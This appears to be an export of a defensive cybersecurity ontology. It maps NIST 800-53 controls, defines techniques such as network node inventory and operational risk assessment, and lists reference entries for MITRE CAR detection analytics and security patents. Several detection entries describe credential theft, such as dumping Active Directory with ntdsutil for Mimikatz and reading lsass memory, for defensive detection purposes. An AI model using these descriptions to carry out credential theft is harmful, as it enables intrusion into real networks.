rdfs:label

  • "AC-3(11)"

control-name

  • "Access Enforcement | Restrict Access to Specific Information Types"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-3(13)"

control-name

  • "Access Enforcement | Attribute-based Access Control"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-3(3)"

control-name

  • "Access Enforcement | Mandatory Access Control"

exactly

member-of

Usage (5)

rdfs:label

  • "AC-3(7)"

control-name

  • "Access Enforcement | Role-based Access Control"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-3(8)"

control-name

  • "Access Enforcement | Revocation of Access Authorizations"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4"

control-name

  • "Information Flow Enforcement"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(1)"

control-name

  • "Information Flow Enforcement | Object Security and Privacy Attributes"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(10)"

broader

control-name

  • "Information Flow Enforcement | Enable and Disable Security or Privacy Policy Filters"

member-of

Usage (5)

rdfs:label

  • "AC-4(11)"

broader

control-name

  • "Information Flow Enforcement | Configuration of Security or Privacy Policy Filters"

member-of

Usage (5)

rdfs:label

  • "AC-4(12)"

control-name

  • "Information Flow Enforcement | Data Type Identifiers"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(13)"

control-name

  • "Information Flow Enforcement | Decomposition into Policy-relevant Subcomponents"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(14)"

control-name

  • "Information Flow Enforcement | Security or Privacy Policy Filter Constraints"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(15)"

control-name

  • "Information Flow Enforcement | Detection of Unsanctioned Information"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(17)"

control-name

  • "Information Flow Enforcement | Domain Authentication"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(19)"

control-name

  • "Information Flow Enforcement | Validation of Metadata"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(20)"

control-name

  • "Information Flow Enforcement | Approved Solutions"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(21)"

control-name

  • "Information Flow Enforcement | Physical or Logical Separation of Information Flows"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(26)"

control-name

  • "Information Flow Enforcement | Audit Filtering Actions"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(27)"

control-name

  • "Information Flow Enforcement | Redundant/independent Filtering Mechanisms"

exactly

member-of

Usage (5)

rdfs:label

  • "AC-4(28)"

control-name

  • "Information Flow Enforcement | Linear Filter Pipelines"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(29)"

control-name

  • "Information Flow Enforcement | Filter Orchestration Engines"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(3)"

control-name

  • "Information Flow Enforcement | Dynamic Information Flow Control"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(30)"

control-name

  • "Information Flow Enforcement | Filter Mechanisms Using Multiple Processes"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(32)"

control-name

  • "Information Flow Enforcement | Process Requirements for Information Transfer"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(4)"

control-name

  • "Information Flow Enforcement | Flow Control of Encrypted Information"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(5)"

control-name

  • "Information Flow Enforcement | Embedded Data Types"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(6)"

control-name

  • "Information Flow Enforcement | Metadata"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-4(8)"

control-name

  • "Information Flow Enforcement | Security and Privacy Policy Filters"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-5"

broader

control-name

  • "Separation of Duties"

member-of

Usage (5)

rdfs:label

  • "AC-6"

broader

control-name

  • "Least Privilege"

member-of

Usage (5)

rdfs:label

  • "AC-6(1)"

control-name

  • "Least Privilege | Authorize Access to Security Functions"

exactly

member-of

Usage (5)

rdfs:label

  • "AC-6(10)"

control-name

  • "Least Privilege | Prohibit Non-privileged Users from Executing Privileged Functions"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-6(3)"

control-name

  • "Least Privilege | Network Access to Privileged Commands"

exactly

member-of

Usage (5)

rdfs:label

  • "AC-6(4)"

control-name

  • "Least Privilege | Separate Processing Domains"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-6(5)"

control-name

  • "Least Privilege | Privileged Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-6(6)"

control-name

  • "Least Privilege | Privileged Access by Non-organizational Users"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-6(9)"

broader

control-name

  • "Least Privilege | Log Use of Privileged Functions"

member-of

Usage (5)

rdfs:label

  • "AC-7"

control-name

  • "Unsuccessful Logon Attempts"

exactly

member-of

Usage (5)

rdfs:label

  • "AC-7(3)"

control-name

  • "Unsuccessful Logon Attempts | Biometric Attempt Limiting"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-7(4)"

broader

control-name

  • "Unsuccessful Logon Attempts | Use of Alternate Authentication Factor"

member-of

Usage (5)

rdfs:label

  • "AU-10(5)"

broader

control-name

  • "Non-repudiation | Digital Signatures"

member-of

Usage (5)

rdfs:label

  • "AU-14(2)"

control-name

  • "Session Audit | Capture and Record Content"

member-of

narrower

Usage (5)

rdfs:label

  • "AU-15"

control-name

  • "Alternate Audit Logging Capability"

member-of

narrower

Usage (5)

rdfs:label

  • "AU-2"

control-name

  • "Event Logging"

exactly

member-of

Usage (5)

rdfs:label

  • "AU-2(1)"

control-name

  • "Event Logging | Compilation of Audit Records from Multiple Sources"

exactly

member-of

Usage (5)

rdfs:label

  • "AU-2(2)"

control-name

  • "Event Logging | Selection of Audit Events by Component"

exactly

member-of

Usage (5)

rdfs:label

  • "AU-3"

control-name

  • "Content of Audit Records"

exactly

member-of

Usage (5)

rdfs:label

  • "AU-4"

control-name

  • "Audit Log Storage Capacity"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-14"

control-name

  • "Signed Components"

member-of

Usage (5)

rdfs:label

  • "CM-5"

control-name

  • "Access Restrictions for Change"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-5(1)"

control-name

  • "Access Restrictions for Change | Automated Access Enforcement and Audit Records"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-5(3)"

control-name

  • "Access Restrictions for Change | Signed Components"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-5(5)"

control-name

  • "Access Restrictions for Change | Privilege Limitation for Production and Operation"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-5(6)"

control-name

  • "Access Restrictions for Change | Limit Library Privileges"

member-of

narrower

Usage (5)

rdfs:label

  • "CM-6(3)"

broader

control-name

  • "Configuration Settings | Unauthorized Change Detection"

member-of

Usage (5)

rdfs:label

  • "IA-2(1)"

control-name

  • "Identification and Authentication (organizational Users) | Multi-factor Authentication to Privileged Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "IA-2(2)"

control-name

  • "Identification and Authentication (organizational Users) | Multi-factor Authentication to Non-privileged Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "IA-2(4)"

control-name

  • "Identification and Authentication (organizational Users) | Local Access to Non-privileged Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "IA-2(6)"

control-name

  • "Identification and Authentication (organizational Users) | Access to Accounts —separate Device"

member-of

narrower

Usage (5)

rdfs:label

  • "IR-4(12)"

control-name

  • "Incident Handling | Malicious Code and Forensic Analysis"

member-of

Usage (5)

rdfs:label

  • "IR-4(13)"

control-name

  • "Incident Handling | Behavior Analysis"

member-of

Usage (5)

rdfs:label

  • "MA-3(3)"

control-name

  • "Maintenance Tools | Prevent Unauthorized Removal"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-3(4)"

control-name

  • "Maintenance Tools | Restricted Tool Use"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-3(5)"

control-name

  • "Maintenance Tools | Execution with Privilege"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-3(6)"

control-name

  • "Maintenance Tools | Software Updates and Patches"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-4(1)"

control-name

  • "Nonlocal Maintenance | Logging and Review"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-6"

control-name

  • "Timely Maintenance"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-6(1)"

control-name

  • "Timely Maintenance | Preventive Maintenance"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-6(2)"

control-name

  • "Timely Maintenance | Predictive Maintenance"

member-of

narrower

Usage (5)

rdfs:label

  • "MA-6(3)"

control-name

  • "Timely Maintenance | Automated Support for Predictive Maintenance"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-3(3)"

broader

control-name

  • "Risk Assessment | Dynamic Threat Awareness"

member-of

Usage (5)

rdfs:label

  • "RA-3(4)"

control-name

  • "Risk Assessment | Predictive Cyber Analytics"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-5"

broader

control-name

  • "Vulnerability Monitoring and Scanning"

member-of

Usage (5)

rdfs:label

  • "RA-5(2)"

control-name

  • "Vulnerability Monitoring and Scanning | Update Vulnerabilities to Be Scanned"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-5(3)"

control-name

  • "Vulnerability Monitoring and Scanning | Breadth and Depth of Coverage"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-5(4)"

control-name

  • "Vulnerability Monitoring and Scanning | Discoverable Information"

member-of

Usage (5)

rdfs:label

  • "RA-5(5)"

control-name

  • "Vulnerability Monitoring and Scanning | Privileged Access"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-5(6)"

control-name

  • "Vulnerability Monitoring and Scanning | Automated Trend Analyses"

member-of

narrower

Usage (5)

rdfs:label

  • "RA-5(7)"

control-name

  • "Vulnerability Monitoring and Scanning | Automated Detection and Notification of Unauthorized Components"

member-of

narrower

Usage (5)

rdfs:label

  • "SA-10(1)"

control-name

  • "Developer Configuration Management | Software and Firmware Integrity Verification"

member-of

Usage (5)

rdfs:label

  • "SA-10(3)"

control-name

  • "Developer Configuration Management | Hardware Integrity Verification"

member-of

Usage (5)

rdfs:label

  • "SA-10(4)"

control-name

  • "Developer Configuration Management | Trusted Generation"

member-of

Usage (5)

rdfs:label

  • "SA-10(5)"

control-name

  • "Developer Configuration Management | Mapping Integrity for Version Control"

member-of

Usage (5)

rdfs:label

  • "SA-10(6)"

control-name

  • "Developer Configuration Management | Trusted Distribution"

member-of

Usage (5)

rdfs:label

  • "SA-11(1)"

control-name

  • "Developer Testing and Evaluation | Static Code Analysis"

member-of

Usage (5)

rdfs:label

  • "SA-11(8)"

control-name

  • "Developer Testing and Evaluation | Dynamic Code Analysis"

member-of

Usage (5)

rdfs:label

  • "SA-8(18)"

control-name

  • "Security and Privacy Engineering Principles | Trusted Communications Channels"

member-of

Usage (5)

rdfs:label

  • "SA-8(22)"

control-name

  • "Security and Privacy Engineering Principles | Accountability and Traceability"

member-of

Usage (5)

rdfs:label

  • "SC-2"

broader

control-name

  • "Separation of System and User Functionality"

member-of

Usage (5)

rdfs:label

  • "SC-2(1)"

control-name

  • "Separation of System and User Functionality | Interfaces for Non-privileged Users"

member-of

narrower

Usage (5)

rdfs:label

  • "SC-3"

broader

control-name

  • "Security Function Isolation"

member-of

Usage (5)

rdfs:label

  • "SC-3(1)"

control-name

  • "Security Function Isolation | Hardware Separation"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-2(4)"

control-name

  • "Flaw Remediation | Automated Patch Management Tools"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-2(5)"

control-name

  • "Flaw Remediation | Automatic Software and Firmware Updates"

exactly

member-of

Usage (5)

rdfs:label

  • "SI-2(6)"

control-name

  • "Flaw Remediation | Removal of Previous Versions of Software and Firmware"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-3"

broader

control-name

  • "Malicious Code Protection"

member-of

Usage (5)

rdfs:label

  • "SI-3(10)"

control-name

  • "Malicious Code Protection | Malicious Code Analysis"

exactly

member-of

Usage (5)

rdfs:label

  • "SI-3(4)"

control-name

  • "Malicious Code Protection | Updates Only by Privileged Users"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-3(8)"

control-name

  • "Malicious Code Protection | Detect Unauthorized Commands"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-4"

broader

control-name

  • "System Monitoring"

member-of

Usage (5)

rdfs:label

  • "SI-4(2)"

control-name

  • "System Monitoring | Automated Tools and Mechanisms for Real-time Analysis"

member-of

narrower

Usage (5)

rdfs:label

  • "SI-4(4)"

control-name

  • "System Monitoring | Inbound and Outbound Communications Traffic"

member-of

narrower

Usage (5)

'has icon'

  • "network.svg"

altLabel

  • "Computer Network"

comment

  • "A network is a group of computers that use a set of common communication protocols over digital interconnections for the purpose of sharing resources located on or provided by the network nodes. The interconnections between nodes are formed from a broad spectrum of telecommunication network technologies, based on physically wired, optical, and wireless radio-frequency methods that may be arranged in a variety of network topologies."

rdfs:label

  • "Network"

rdfs:seeAlso

  • http://wordnet-rdf.princeton.edu/id/03826490-n

Usage (5)

definition

  • "Network mapping encompasses the techniques to identify and model the physical layer, network layer, and data exchange layers of the organization's network and their physical location, and determine allowed pathways through that network."

rdfs:label

  • "Network Mapping"

d3fend-id

  • "D3-NM"

display-order

  • 3

enables

Usage (5)

definition

  • "Network node inventorying identifies and records all the network nodes (hosts, routers, switches, firewalls, etc.) in the organization's architecture."

kb-article

  • "## How it works
    Administrators collect information on network nodes in their architecture using a variety of administrative and management tools that query network devices and nodes for information. In some cases, where such queries are not supported or provide specific information of interest, an administrator may also collect this information through network enumeration methods to include host discovery and scanning for active ports and services.

    ## Considerations
    * Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.
    * An adversary conducting network enumeration may engage in activities that parallel normal hardware inventorying activities, but would require escalating to admin privileges for most of the operations requiting administrative tools

    ## Examples
    * Link-layer discovery
    * Link-layer Discovery Protocol (LLDP)
    * Cisco Discovery Protocol (CDP)
    * Application-layer discovery
    * Simple Network Management Protocol (SNMP) collects MIB information
    * Web-based Enterprise Management (WBEM) collects CIM information
    * Windows Management Instrumentation (WMI)
    * Windows Management Infrastructure (MI)"

rdfs:label

  • "Network Node Inventory"

synonym

  • "System Discovery"
  • "System Inventorying"

d3fend-id

  • "D3-NNI"

inventories

kb-reference

Usage (5)

definition

  • "Network traffic policy mapping identifies and models the allowed pathways of data at the network, tranport, and/or application levels."

rdfs:label

  • "Network Traffic Policy Mapping"

synonym

  • "DLP Policy Mapping"
  • "Firewall Mapping"
  • "IPS Policy Mapping"
  • "Web Security Gateway Policy Mapping"

d3fend-id

  • "D3-NTPM"

kb-reference

maps

queries

Usage (5)

definition

  • "Network vulnerability assessment relates all the vulnerabilities of a network's components in the context of their configuration and interdependencies and can also include assessing risk emerging from the network's design as a whole, not just the sum of individual network node or network segment vulnerabilities."

rdfs:label

  • "Network Vulnerability Assessment"

d3fend-id

  • "D3-NVA"

evaluates

identifies

Usage (5)

comment

  • "Identifying staff and organizational structure is part of operational activity mapping. One inventories assets; people are *not* assets, but are resources. Grasping operations and activities (missions) and mapping them to people is (notionally) last phase of modeling architecture."

definition

  • "Operational activity mapping identifies activities of the organization and the organization's suborganizations, groups, roles, and individuals that carry out the activities and then establishes the dependencies of the activities on the systems and people that perform those activities."

rdfs:label

  • "Operational Activity Mapping"

synonym

  • "Mission Mapping"

d3fend-id

  • "D3-OAM"

enables

kb-reference

Usage (5)

definition

  • "Operational dependency mapping identifies and models the dependencies of the organization's activities on each other and on the organization's performers (people, systems, and services.) This may include modeling the higher- and lower-level activities of an organization forming a hierarchy, or layering, of the dependencies in an organization's activities."

rdfs:label

  • "Operational Dependency Mapping"

d3fend-id

  • "D3-ODM"

kb-reference

maps

Usage (5)

definition

  • "Operational risk assessment identifies and models the vulnerabilities of, and risks to, an organization's activities individually and as a whole."

rdfs:label

  • "Operational Risk Assessment"

synonym

  • "Mission Risk Assessment"

d3fend-id

  • "D3-ORA"

evaluates

identifies

kb-reference

Usage (5)

rdfs:label

  • "Organization"

Usage (5)

definition

  • "Organization mapping identifies and models the people, roles, and groups with an organization and the relations between them."

rdfs:label

  • "Organization Mapping"

d3fend-id

  • "D3-OM"

display-order

  • 4

kb-reference

maps

may-map

Usage (5)

rdfs:label

  • "Organizational Activity"

Usage (5)

definition

  • "Passive logical link mapping only listens to network traffic as a means to map the the whole data link layer, where the links represent logical data flows rather than physical connections."

rdfs:label

  • "Passive Logical Link Mapping"

synonym

  • "Passive Logical Layer Mapping"

d3fend-id

  • "D3-PLLM"

kb-reference

Usage (5)

definition

  • "Passive physical link mapping only listens to network traffic as a means to map the physical layer."

rdfs:label

  • "Passive Physical Link Mapping"

synonym

  • "Passive Physical Layer Mapping"

d3fend-id

  • "D3-PPLM"

Usage (5)

rdfs:label

  • "Person"

Usage (5)

definition

  • "A physical link is a dedicated connection for communication that uses some physical media (electrical, electromagnetic, optical, to include clear spaces or vacuums.) A physical link represents only a single hop (link) in any larger communcations path, circuit, or network.

    NOTE: not synonymous with data link as a data link can be over a telecommunications circuit, which may be a virtual circuit composed of multiple phyical links."

rdfs:label

  • "Physical Link"

rdfs:seeAlso

synonym

  • "Layer-1 Link"

Usage (5)

definition

  • "Physical link mapping identifies and models the link connectivity of the network devices within a physical network."

rdfs:label

  • "Physical Link Mapping"

synonym

  • "Layer 1 Mapping"

d3fend-id

  • "D3-PLM"

kb-reference

maps

Usage (5)

kb-abstract

  • "Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-07-001: Access Permission Modification - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-07-001: Access Permission Modification"

Usage (5)

kb-abstract

  • "Systems, methods, and related technologies for account access monitoring are described. In certain aspects, a login request associated with a device can be analyzed and a score determined. The score and a threshold can be used to determine whether to initiate an action."

kb-author

  • "Chunhui Zhan, Siying Yang"

kb-mitre-analysis

  • ""

kb-organization

  • "Forescout Technologies"

rdfs:label

  • "Reference - Account monitoring - Forescout Technologies"

kb-reference-of

kb-reference-title

  • "Account monitoring"

Usage (5)

kb-abstract

  • "The NTDSUtil tool may be used to dump a Microsoft Active Directory database to disk for processing with a credential access tool such as Mimikatz. This is performed by launching ntdsutil.exe as a privileged user with command line arguments indicating that media should be created for offline Active Directory installation and specifying a folder path. This process will create a copy of the Active Directory database, ntds.dit, to the specified folder path."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-08-002: Active Directory Dumping via NTDSUtil - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-08-002: Active Directory Dumping via NTDSUtil"

Usage (5)

kb-abstract

  • "System and methodology providing automated or "proactive" network security ("active" firewall) are described. The system implements methodology for verifying or authenticating communications, especially between network security components thereby allowing those components to share information. In one embodiment, a system implementing an active firewall is provided which includes methodology for verifying or authenticating communications between network components (e.g., sensor(s), arbiter, and actor(s)), using cryptographic keys or digital certificates. Certificates may be used to digitally sign a message or file and, in a complementary manner, to verify a digital signature. At the outset, particular software components that may participate in authenticated communication are specified, including creating a digital certificate for each such software component. Upon detection by a sensor that an event of interest that has occurred in the computer network system, the system may initiate authenticated communication between the sensor component and a central arbiter (e.g., "event orchestrator") component, so that the sensor may report the event to the arbiter or "brain." Thereafter, the arbiter (if it chooses to act on that information) initiates authenticated communication between itself and a third software component, an "actor" component (e.g., "firewall"). The arbiter may indicate to the actor how it should handle the event. The actor or firewall, upon receiving the information, may now undertake appropriate action, such as dynamically creating or modifying rules for appropriately handling the event, or it may choose to simply ignore the information."

kb-author

  • "Emilio Villa, Adrian Zidaritz, Michael David Varga, Gerhard Eschelbeck, Michael Kevin Jones, Mark James McArdle"

kb-mitre-analysis

  • ""

kb-organization

  • "McAfee LLC"

rdfs:label

  • "Reference - Active firewall system and methodology - McAfee LLC"

kb-reference-of

kb-reference-title

  • "Active firewall system and methodology"

Usage (5)

kb-abstract

  • "Disclosed is a device management system for discovery and management of components added to computer systems and sub-systems. The device management system provides for recognizing a newly added component, and determining if the newly added component is already a part of the system inventory. The newly added component is matched with a component currently on the system, based on at least one matching attribute. A point total is calculated for each match level and a final match score is provided. The match score is compared with an aggressiveness level to determine if a match does indeed exist."

kb-author

  • "Rajneesh Jalan, Joseph M. Schmitt, and Marco Simoes"

kb-organization

  • "Device42 Inc"

rdfs:label

  • "Reference - Advanced device matching system"

kb-reference-of

kb-reference-title

  • "Advanced device matching system"

Usage (5)

kb-abstract

  • "Once a credential dumper like mimikatz runs, every user logged on since boot is potentially compromised, because the credentials were accessed via the memory of lsass.exe. When such an event occurs, this analytic will give the forensic context to identify compromised users. Those users could potentially be used in later events for additional logons.

    The time field indicates the first and last time a system reported a user logged into a given system. This means that activity could be intermittent between the times given and should not be considered a duration."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2015-07-001: All Logins Since Last Boot - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2015-07-001: All Logins Since Last Boot"

Usage (5)

kb-abstract

  • "This paper provides an in-depth technical assessment of the security improvements implemented in Windows Vista, focusing primarily on the areas of User Account Protection and User Interface Privilege Isolation. This paper discusses these features and touches on several of their shortcomings. It then demonstrates how it is possible to combine these attacks to gain full control over the machine from low integrity, low privilege process."

kb-author

  • "Matthew Conover"

kb-mitre-analysis

  • ""

kb-organization

  • "Symantec Corporation"

rdfs:label

  • "Reference - Analysis of the Windows Vista Security Model - Symantec Corporation"

kb-reference-of

kb-reference-title

  • "Analysis of the Windows Vista Security Model"

Usage (5)

kb-abstract

  • "The invention provides a system and method for automatic creation of adaptive behavioral profiles for observables associated with resource states and events in a computer network (IT) infrastructure of an enterprise and for detecting anomalies that represent potential malicious activity and threats as deviations from normal behavior. Separate profiles may be created for each behavioral indicator, as well as for each time series of measurements, and aggregated to create an overall behavioral profile. An anomaly probability is determined from the behavioral profile and used to evaluate the data values of observables. Outlier data values which deviate from normal behavior by more than a predetermined probability threshold are identified for risk analysis as possible threats while inliers within the range of normal behavior are used to update the behavioral profile. Behavioral profiles are created for behavioral indicators based upon observables measured over predetermined time periods using algorithms employing statistical analysis approaches that work for any type of data distribution, and profiles are adapted over time using data aging to more closely represent current behavior. Algorithm parameters for creating profiles are based on the type of data, i.e., its metadata."

kb-author

  • "Igor A. Baikalov; Tanuj Gulati; Sachin Nayyar; Anjaneya Shenoy; Ganpatrao H. Patwardhan"

kb-mitre-analysis

  • "The patent describes a technique for detecting anomalous activity within an organization's IT infrastructure to identify threats. Behavioral profiles can be grouped by peer groups that identify functionally similar groups of actors (users or resources) based on their attributes and pre-defined grouping rules. For example, users can be grouped by their job title, organizational hierarchy, or location and can be observed for similarities in access patterns, based on granted access entitlements or actual logged resource access.

    Behavioral profiles are created from measurements of events over a time period for example:

    * Transaction counts
    * Concurrent users per hour
    * Daily volume of data

    Outlier data values which deviate from behavioral profile by more than a predetermined probability threshold are identified for risk analysis as possible threats."

kb-organization

  • "Securonix Inc"

rdfs:label

  • "Reference - Anomaly Detection Using Adaptive Behavioral Profiles - Securonix Inc"

kb-reference-of

kb-reference-title

  • "Anomaly Detection Using Adaptive Behavioral Profiles"

Usage (5)

kb-abstract

  • "An anti-tamper system is disclosed that includes self-adjusting guards inserted in software. Self-adjusting guards include invocation criteria and guard function. During run-time, each time the self-adjusting guard is invoked, the invocation criteria is evaluated and the guard function is only executed if the invocation criteria is satisfied. The invocation criteria can be static or dynamic, satisfied randomly with fixed or varying probability, a monotonically or exponentially decreasing function or most any other type of function. The invocation criteria can be satisfied based on elapsed inter-guard invocation time (time since last guard function execution), target inter-guard invocation time, and/or guard execution time. A method is disclosed of inserting self-adjusting guards into software, and executing the software. Evaluating the invocation criteria can include adjusting the invocation criteria when satisfied. The self-adjusting guards can be inserted into the software at a source or object code level."

kb-author

  • "Kevin Dale Morgan"

kb-mitre-analysis

  • ""

kb-organization

  • "ARXAN TECHNOLOGIES Inc"

rdfs:label

  • "Reference - Anti-tamper system with self-adjusting guards - ARXAN TECHNOLOGIES Inc"

kb-reference-of

kb-reference-title

  • "Anti-tamper system with self-adjusting guards"

Usage (5)

kb-abstract

  • "An apparatus is disclosed for to provide content to and query a reverse domain name system (DNS) server without depending on the kindness of domain name system registrars, registrants. DNS replies are observed by firewalls or filters, analyzed, and transmitted to a reverse domain name system server. An embodiment of the present invention can be within a DNS server or SMTP server."

kb-author

  • "Dean Danko"

kb-mitre-analysis

  • "This patent includes the description of a method of blocking email traffic from untrusted domains by analyzing the TCP/IP source IP addresses and blocking traffic for IPs whose reverse lookup response FQDN matches a denylist."

rdfs:label

  • "Reference - Apparatus for to provide content to and query a reverse domain name system server - Barrracuda Networks"

kb-reference-of

kb-reference-title

  • "Apparatus for to provide content to and query a reverse domain name system server"

Usage (5)

kb-abstract

  • "A system comprises one or more application containers, each application container including computer-readable instructions and initiated via a container service and isolated using operating system-level virtualization. The system also comprises one or more virtual switches configured to route traffic from the application containers. The system further comprises one or more security containers, each security container configured to transparently intercept traffic from the one or more application containers for analysis of network security. The system further comprises a user interface (UI) container configured to receive configuration settings from a user. The system also comprises an analytics container configured to perform analysis on data received from the one or more security containers. The system also comprises a management container configured to configure settings for the one or more security containers and the analytics container."

kb-author

  • "Gang Duan"

kb-mitre-analysis

  • ""

kb-organization

  • "Neuvector Inc"

rdfs:label

  • "Reference - Architecture of transparent network security for application containers - Neuvector Inc"

kb-reference-of

kb-reference-title

  • "Architecture of transparent network security for application containers"

Usage (5)

kb-abstract

  • "A system and process for addressing computer security vulnerabilities. The system and process generally comprise aggregating vulnerability information on a plurality of computer vulnerabilities; constructing a remediation database of said plurality of computer vulnerabilities; constructing a remediation signature to address the computer vulnerabilities; and deploying said remediation signature to a client computer. The remediation signature essentially comprises a sequence of actions to address a corresponding vulnerability. A managed automated approach to the process is contemplated in which the system is capable of selective deployment of remediation signatures; selective resolution of vulnerabilities; scheduled deployment of remediation signatures; and scheduled scanning of client computers for vulnerabilities."

kb-author

  • "Carl E. Banzhof"

kb-organization

  • "McAfee LLC"

rdfs:label

  • "Reference - Automated computer vulnerability resolution system"

kb-reference-of

kb-reference-title

  • "Automated computer vulnerability resolution system"

Usage (5)

kb-abstract

  • "A cyber security system comprising circuitry of a decoy deployer planting one or more decoy lateral attack vectors in each of a first and a second group of resources within a common enterprise network of resources, the first and second groups of resources having different characteristics in terms of subnets, naming conventions, DNS aliases, listening ports, users and their privileges, and installed applications, wherein a lateral attack vector is an object of a first resource within the network that has a potential to be used by an attacker who discovered the first resource to further discover information regarding a second resource within the network, the second resource being previously undiscovered by the attacker, and wherein the decoy lateral attack vectors in the first group conform to the characteristics of the first group, and the decoy lateral attack vectors in the second group conform to the characteristics of the second group."

kb-author

  • "Shlomo Touboul; Hanan Levin; Stephane Roubach; Assaf Mischari; Itai Ben David; Itay Avraham; Adi Ozer; Chen Kazaz; Ofer Israeli; Olga Vingurt; Liad Gareh; Israel Grimberg; Cobby Cohen; Sharon Sultan; Matan Kubovsky"

kb-mitre-analysis

  • ""

kb-organization

  • "Illusive Networks Ltd"

rdfs:label

  • "Reference - Automatically generating network resource groups and assigning customized decoy policies thereto - Illusive Networks Ltd"

kb-reference-of

kb-reference-title

  • "Automatically generating network resource groups and assigning customized decoy policies thereto"

Usage (5)

kb-abstract

  • "A method and system for creating security policies for firewall and connection policies in an integrated manner is provided. The security system provides a user interface through which a user can define a security rule that specifies both a firewall policy and a connection policy. After the security rule is specified, the security system automatically generates a firewall rule and a connection rule to implement the security rule. The security system provides the firewall rule to a firewall engine that is responsible for enforcing the firewall rules and provides the connection rule to an IPsec engine that is responsible for enforcing the connection rules"

kb-author

  • "Charles D. Bassett; Eran Yariv; Ian M. Carbaugh; Lokesh Srinivas Koppolu; Maksim Noy; Sarah A. Wahlert; Pradeep Bahl"

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - Automatically generating rules for connection security - Microsoft"

kb-reference-of

kb-reference-title

  • "Automatically generating rules for connection security"

Usage (5)

kb-abstract

  • "The Sysinternals tool Autoruns checks the registry and file system for known identify persistence mechanisms. It will output any tools identified, including built-in or added-on Microsoft functionality and third party software. Many of these locations are known by adversaries and used to obtain Persistence. Running Autoruns periodically in an environment makes it possible to collect and monitor its output for differences, which may include the removal or addition of persistent tools. Depending on the persistence mechanism and location, legitimate software may be more likely to make changes than an adversary tool. Thus, this analytic may result in significant noise in a highly dynamic environment. While Autoruns is a convenient method to scan for programs using persistence mechanisms its scanning nature does not conform well to streaming based analytics. This analytic could be replaced with one that draws from sensors that collect registry and file information if streaming analytics are desired.

    Utilizes the Sysinternals autoruns tool (ignoring validated Microsoft entries). Primarily not a detection analytic by itself but through analysis of results by an analyst can be used for such. Building another analytic on top of this one identifying unusual entries would likely be a beneficial alternative."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-01-002: Autorun Differences - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-01-002: Autorun Differences"

Usage (5)

kb-abstract

